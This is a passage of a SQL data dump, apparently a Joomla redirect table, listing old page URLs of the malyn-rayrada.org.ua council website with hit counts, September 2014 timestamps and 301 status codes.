00:00:00',301),(777,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=51:--19072013-&Itemid=92&lang=ru','','','',9,0,'2014-09-16 21:25:17','0000-00-00 00:00:00',301),(778,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-------l-r--2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',7,0,'2014-09-16 21:25:25','0000-00-00 00:00:00',301),(779,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1046:-2013-&catid=11&Itemid=14&lang=uk','','','',21,0,'2014-09-16 21:25:29','0000-00-00 00:00:00',301),(780,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=54:--29112013-&Itemid=95&lang=uk','','','',8,0,'2014-09-16 21:25:53','0000-00-00 00:00:00',301),(781,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=867:2012-12-14-10-13-30&catid=36&Itemid=70&lang=uk','','','',4,0,'2014-09-16 21:26:47','0000-00-00 00:00:00',301),(782,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=51&Itemid=92&lang=uk','','','',34,0,'2014-09-16 21:26:49','0000-00-00 00:00:00',301),(783,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=875:-2013-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-09-16 21:33:04','0000-00-00 00:00:00',301),(784,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',7,0,'2014-09-16 21:34:06','0000-00-00 00:00:00',301),(785,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&Itemid=14&lang=ru','','','',30,0,'2014-09-16 21:34:22','0000-00-00 00:00:00',301),(786,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&Itemid=14&lang=uk','','','',17,0,'2014-09-16 21:37:35','0000-00-00 00:00:00',301),(787,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47&Itemid=86&lang=uk','','','',10,0,'2014-09-16 21:38:17','0000-00-00 00:00:00',301),(788,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=36&Itemid=70&lang=uk','','','',8,0,'2014-09-16 21:40:35','0000-00-00 00:00:00',301),(789,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:-l-r&catid=51:--19072013-&Itemid=92&lang=ru','','','',14,0,'2014-09-16 21:40:50','0000-00-00 00:00:00',301),(790,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:--------15--2010---12-l----r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',13,0,'2014-09-16 21:42:04','0000-00-00 00:00:00',301),(791,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',8,0,'2014-09-16 21:42:05','0000-00-00 00:00:00',301),(792,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&catid=56&Itemid=97&lang=uk','','','',12,0,'2014-09-16 21:43:53','0000-00-00 00:00:00',301),(793,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&catid=51:--19072013-&Itemid=92&lang=uk','','','',8,0,'2014-09-16 21:44:08','0000-00-00 00:00:00',301),(794,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1230:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-16 21:44:24','0000-00-00 00:00:00',301),(795,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&catid=56&Itemid=97&lang=en','','','',10,0,'2014-09-16 21:46:47','0000-00-00 00:00:00',301),(796,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',21,0,'2014-09-16 21:46:58','0000-00-00 00:00:00',301),(797,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',17,0,'2014-09-16 21:47:55','0000-00-00 00:00:00',301),(798,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1145:2013-11-27-09-47-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',13,0,'2014-09-16 21:51:16','0000-00-00 00:00:00',301),(799,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&catid=36&Itemid=70&lang=ru','','','',7,0,'2014-09-16 21:51:25','0000-00-00 00:00:00',301),(800,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-16 21:52:02','0000-00-00 00:00:00',301),(801,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1327:2014-06-01-11-51-13&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-09-16 21:52:29','0000-00-00 00:00:00',301),(802,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1084:-qq&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-16 21:53:28','0000-00-00 00:00:00',301),(803,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-16 21:55:13','0000-00-00 00:00:00',301),(804,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=36&Itemid=70&lang=en','','','',5,0,'2014-09-16 21:55:58','0000-00-00 00:00:00',301),(805,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',11,0,'2014-09-16 21:56:15','0000-00-00 00:00:00',301),(806,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=6&Itemid=9&lang=uk','','','',5,0,'2014-09-16 21:56:57','0000-00-00 00:00:00',301),(807,'http://www.malyn-rayrada.org.ua/index.php?option=com_rd_sitemap&view=sitemap&id=1&Itemid=31&lang=en','','','',20,0,'2014-09-16 21:59:37','0000-00-00 00:00:00',301),(808,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=919:2013-01-31-10-15-40&catid=11&Itemid=14&lang=en','','','',3,0,'2014-09-16 22:00:07','0000-00-00 00:00:00',301),(809,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&catid=49:--12042013-&Itemid=88&lang=uk','','','',25,0,'2014-09-16 22:00:23','0000-00-00 00:00:00',301),(810,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',15,0,'2014-09-16 22:00:43','0000-00-00 00:00:00',301),(811,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1246:-2013-&catid=57:--15042014-&Itemid=98&lang=en','','','',5,0,'2014-09-16 22:01:06','0000-00-00 00:00:00',301),(812,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-09-16 22:01:48','0000-00-00 00:00:00',301),(813,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1331:2014-06-04-07-15-27&catid=36&Itemid=70&lang=ru','','','',9,0,'2014-09-16 22:02:01','0000-00-00 00:00:00',301),(814,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',13,0,'2014-09-16 22:10:43','0000-00-00 00:00:00',301),(815,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&Itemid=14&lang=ru','','','',5,0,'2014-09-16 22:21:50','0000-00-00 00:00:00',301),(816,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-16 22:23:41','0000-00-00 00:00:00',301),(817,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-16 22:23:59','0000-00-00 00:00:00',301),(818,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&Itemid=14&lang=uk','','','',16,0,'2014-09-16 22:25:32','0000-00-00 00:00:00',301),(819,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1102:2013-10-03-08-08-33&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-16 22:25:56','0000-00-00 00:00:00',301),(820,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:-l-r-&catid=53&Itemid=94&lang=uk','','','',12,0,'2014-09-16 22:27:10','0000-00-00 00:00:00',301),(821,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1229:2014-02-28-09-49-28&catid=11&Itemid=14&lang=uk','','','',7,0,'2014-09-16 22:27:11','0000-00-00 00:00:00',301),(822,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=987:2013-04-15-06-06-41&catid=49:--12042013-&Itemid=88&lang=ru','','','',12,0,'2014-09-16 22:28:51','0000-00-00 00:00:00',301),(823,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',27,0,'2014-09-16 22:28:53','0000-00-00 00:00:00',301),(824,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=54:--29112013-&Itemid=95&lang=ru','','','',7,0,'2014-09-16 22:29:13','0000-00-00 00:00:00',301),(825,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=881:2012-12-21-17-06-15&catid=46:--21122012&Itemid=85&lang=uk','','','',11,0,'2014-09-16 22:30:29','0000-00-00 00:00:00',301),(826,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1085:2013-09-11-12-15-54&catid=36&Itemid=70&lang=uk','','','',10,0,'2014-09-16 22:30:43','0000-00-00 00:00:00',301),(827,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=875:-2013-&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-16 22:32:02','0000-00-00 00:00:00',301),(828,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:--------l---r---&catid=36&Itemid=70&lang=ru','','','',7,0,'2014-09-16 22:32:47','0000-00-00 00:00:00',301),(829,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&catid=55&Itemid=96&lang=en','','','',11,0,'2014-09-16 22:33:01','0000-00-00 00:00:00',301),(830,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=36&Itemid=70&lang=ru','','','',14,0,'2014-09-16 22:34:21','0000-00-00 00:00:00',301),(831,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:----3110&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',11,0,'2014-09-16 22:34:35','0000-00-00 00:00:00',301),(832,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&catid=51:--19072013-&Itemid=92&lang=ru','','','',7,0,'2014-09-16 22:35:21','0000-00-00 00:00:00',301),(833,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&catid=56:--03022014-&Itemid=97&lang=uk','','','',20,0,'2014-09-16 22:35:43','0000-00-00 00:00:00',301),(834,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&catid=56:--03022014-&Itemid=97&lang=ru','','','',26,0,'2014-09-16 22:35:44','0000-00-00 00:00:00',301),(835,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=36&Itemid=70&lang=uk','','','',11,0,'2014-09-16 22:35:45','0000-00-00 00:00:00',301),(836,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&catid=51&Itemid=92&lang=ru','','','',17,0,'2014-09-16 22:38:31','0000-00-00 00:00:00',301),(837,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=955:2013-03-07-06-31-04&catid=48&Itemid=87&lang=en','','','',6,0,'2014-09-16 22:38:51','0000-00-00 00:00:00',301),(838,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11&Itemid=14&lang=en','','','',7,0,'2014-09-16 22:38:54','0000-00-00 00:00:00',301),(839,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-16 22:39:18','0000-00-00 00:00:00',301),(840,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',15,0,'2014-09-16 22:40:19','0000-00-00 00:00:00',301),(841,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1033:2013-06-18-12-58-36&catid=51:--19072013-&Itemid=92&lang=uk','','','',4,0,'2014-09-16 22:41:03','0000-00-00 00:00:00',301),(842,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=993:-21-&catid=11&lang=en','','','',4,0,'2014-09-16 22:41:05','0000-00-00 00:00:00',301),(843,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=905:-2012-2015-&catid=47:-21022013-&Itemid=86&lang=ru','','','',8,0,'2014-09-16 22:41:44','0000-00-00 00:00:00',301),(844,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1016:2013-06-03-11-41-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',1,0,'2014-09-16 22:43:07','0000-00-00 00:00:00',301),(845,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=963:2013-03-13-06-16-53&catid=11&lang=uk','','','',6,0,'2014-09-16 22:43:09','0000-00-00 00:00:00',301),(846,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=961:2013-03-11-10-51-56&catid=48:--11032013-&Itemid=87&lang=uk','','','',9,0,'2014-09-16 22:44:37','0000-00-00 00:00:00',301),(847,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=1&lang=uk','','','',11,0,'2014-09-16 22:45:50','0000-00-00 00:00:00',301),(848,'http://malyn-rayrada.org.ua/index.php?option=com_rd_sitemap&view=sitemap&id=1&Itemid=31&lang=ru','','','',6,0,'2014-09-16 22:45:52','0000-00-00 00:00:00',301),(849,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=36&Itemid=70&lang=uk','','','',9,0,'2014-09-16 22:52:46','0000-00-00 00:00:00',301),(850,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',15,0,'2014-09-16 22:56:05','0000-00-00 00:00:00',301),(851,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',8,0,'2014-09-16 22:56:32','0000-00-00 00:00:00',301),(852,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=57:--15042014-&Itemid=98&lang=ru','','','',13,0,'2014-09-16 22:56:54','0000-00-00 00:00:00',301),(853,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-16 23:00:17','0000-00-00 00:00:00',301),(854,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=974:2013-03-20-09-31-37&catid=49&Itemid=88&lang=ru','','','',5,0,'2014-09-16 23:01:04','0000-00-00 00:00:00',301),(855,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1358:2014-07-07-08-11-22&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-16 23:01:18','0000-00-00 00:00:00',301),(856,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1167:--------l-r-------&catid=55:--26122013-&Itemid=96&lang=ru','','','',18,0,'2014-09-16 23:05:10','0000-00-00 00:00:00',301),(857,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',27,0,'2014-09-16 23:08:21','0000-00-00 00:00:00',301),(858,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1053:2013-07-19-11-34-22&catid=51:--19072013-&Itemid=92&lang=en','','','',28,0,'2014-09-16 23:09:20','0000-00-00 00:00:00',301),(859,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1142:-l-r-&catid=54:--29112013-&Itemid=95&lang=uk','','','',8,0,'2014-09-16 23:10:43','0000-00-00 00:00:00',301),(860,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1376:2014-08-22-08-01-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-16 23:15:58','0000-00-00 00:00:00',301),(861,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=47&Itemid=86&lang=uk','','','',6,0,'2014-09-16 23:19:40','0000-00-00 00:00:00',301),(862,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=319:-2009-2011-&catid=33:-20052011&Itemid=66&lang=uk','','','',12,0,'2014-09-16 23:19:49','0000-00-00 00:00:00',301),(863,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11&Itemid=14&lang=ru','','','',8,0,'2014-09-16 23:21:02','0000-00-00 00:00:00',301),(864,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1345:2014-06-17-07-48-07&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-09-16 23:21:15','0000-00-00 00:00:00',301),(865,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=897:2013-01-18-07-40-55&catid=36&Itemid=70&lang=ru','','','',7,0,'2014-09-16 23:26:01','0000-00-00 00:00:00',301),(866,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',27,0,'2014-09-16 23:26:03','0000-00-00 00:00:00',301),(867,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=853:2012-12-11-13-39-46&catid=32:2011-03-31-12-03-04&Itemid=64&lang=uk','','','',14,0,'2014-09-16 23:27:20','0000-00-00 00:00:00',301),(868,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1224:----25--2014-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',20,0,'2014-09-16 23:27:28','0000-00-00 00:00:00',301),(869,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=49&Itemid=88&lang=uk','','','',12,0,'2014-09-16 23:28:28','0000-00-00 00:00:00',301),(870,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-16 23:30:26','0000-00-00 00:00:00',301),(871,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',21,0,'2014-09-16 23:31:44','0000-00-00 00:00:00',301),(872,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',13,0,'2014-09-16 23:32:12','0000-00-00 00:00:00',301),(873,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=7&Itemid=12&lang=uk','','','',43,0,'2014-09-16 23:36:16','0000-00-00 00:00:00',301),(874,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1047:2013-07-10-05-51-36&catid=51&Itemid=92&lang=uk','','','',24,0,'2014-09-16 23:38:18','0000-00-00 00:00:00',301),(875,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1251:2014-03-24-07-11-22&catid=36&Itemid=70&lang=en','','','',6,0,'2014-09-16 23:38:20','0000-00-00 00:00:00',301),(876,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=51&Itemid=92&lang=ru','','','',8,0,'2014-09-16 23:39:46','0000-00-00 00:00:00',301),(877,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1332:2014-06-04-09-44-02&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',16,0,'2014-09-16 23:40:54','0000-00-00 00:00:00',301),(878,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1027:-2013-2013-&catid=51&Itemid=92&lang=ru','','','',19,0,'2014-09-16 23:41:34','0000-00-00 00:00:00',301),(879,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1232:2014-03-02-14-32-43&catid=11&Itemid=14&lang=uk','','','',18,0,'2014-09-16 23:43:31','0000-00-00 00:00:00',301),(880,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',6,0,'2014-09-16 23:43:48','0000-00-00 00:00:00',301),(881,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=uk','','','',9,0,'2014-09-16 23:44:39','0000-00-00 00:00:00',301),(882,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:---------------l-r---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',11,0,'2014-09-16 23:46:37','0000-00-00 00:00:00',301),(883,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:--------lr---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',22,0,'2014-09-16 23:46:51','0000-00-00 00:00:00',301),(884,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',20,0,'2014-09-16 23:47:07','0000-00-00 00:00:00',301),(885,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:------------------lr-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',9,0,'2014-09-16 23:48:16','0000-00-00 00:00:00',301),(886,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&catid=56:--03022014-&Itemid=97&lang=en','','','',16,0,'2014-09-16 23:52:36','0000-00-00 00:00:00',301),(887,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1155:2013-12-07-15-56-12&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',15,0,'2014-09-16 23:53:19','0000-00-00 00:00:00',301),(888,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&catid=55:--26122013-&Itemid=96&lang=uk','','','',12,0,'2014-09-16 23:54:18','0000-00-00 00:00:00',301),(889,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1168:2014-01-08-07-14-14&catid=55&Itemid=96&lang=uk','','','',2,0,'2014-09-17 00:02:37','0000-00-00 00:00:00',301),(890,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-17 00:12:06','0000-00-00 00:00:00',301),(891,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=38&Itemid=73&lang=ru','','','',14,0,'2014-09-17 00:14:41','0000-00-00 00:00:00',301),(892,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=994:2013-04-23-08-30-51&catid=50:--23042013-&Itemid=90&lang=uk','','','',8,0,'2014-09-17 00:15:05','0000-00-00 00:00:00',301),(893,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1269:-3110&catid=57&Itemid=98&lang=en','','','',8,0,'2014-09-17 00:16:06','0000-00-00 00:00:00',301),(894,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-2012-2015-&catid=56&Itemid=97&lang=en','','','',10,0,'2014-09-17 00:16:24','0000-00-00 00:00:00',301),(895,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&Itemid=14&lang=uk','','','',16,0,'2014-09-17 00:16:51','0000-00-00 00:00:00',301),(896,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=962:-2017-&catid=49:--12042013-&Itemid=88&lang=en','','','',6,0,'2014-09-17 00:17:59','0000-00-00 00:00:00',301),(897,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1331:2014-06-04-07-15-27&catid=59&Itemid=107&lang=uk','','','',7,0,'2014-09-17 00:19:11','0000-00-00 00:00:00',301),(898,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1003:1&catid=11&Itemid=14&lang=en','','','',12,0,'2014-09-17 00:19:41','0000-00-00 00:00:00',301),(899,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:----3110&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',11,0,'2014-09-17 00:19:55','0000-00-00 00:00:00',301),(900,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=894:-2013-2015-&catid=47:--21022013-&Itemid=86&lang=ru','','','',4,0,'2014-09-17 00:21:29','0000-00-00 00:00:00',301),(901,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',16,0,'2014-09-17 00:22:48','0000-00-00 00:00:00',301),(902,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1202:2014-01-31-07-45-54&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',14,0,'2014-09-17 00:22:50','0000-00-00 00:00:00',301),(903,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',19,0,'2014-09-17 00:24:28','0000-00-00 00:00:00',301),(904,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=931:2013-02-21-09-14-48&catid=47&Itemid=86&lang=uk','','','',7,0,'2014-09-17 00:24:45','0000-00-00 00:00:00',301),(905,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=53&Itemid=94&lang=ru','','','',16,0,'2014-09-17 00:24:52','0000-00-00 00:00:00',301),(906,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=5&Itemid=6&lang=uk','','','',41,0,'2014-09-17 00:26:30','0000-00-00 00:00:00',301),(907,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=926:2013-02-21-09-02-30&catid=47&Itemid=86&lang=ru','','','',13,0,'2014-09-17 00:27:20','0000-00-00 00:00:00',301),(908,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1172:2014-01-14-14-46-07&catid=11&Itemid=14&lang=en','','','',13,0,'2014-09-17 00:27:49','0000-00-00 00:00:00',301),(909,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=59:--20062014-&Itemid=107&lang=en','','','',7,0,'2014-09-17 00:28:02','0000-00-00 00:00:00',301),(910,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',11,0,'2014-09-17 00:28:05','0000-00-00 00:00:00',301),(911,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:-l-28r&catid=59:--20062014-&Itemid=107&lang=en','','','',12,0,'2014-09-17 00:28:18','0000-00-00 00:00:00',301),(912,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1260:2014-03-31-11-32-51&catid=10&Itemid=17&lang=uk','','','',9,0,'2014-09-17 00:29:10','0000-00-00 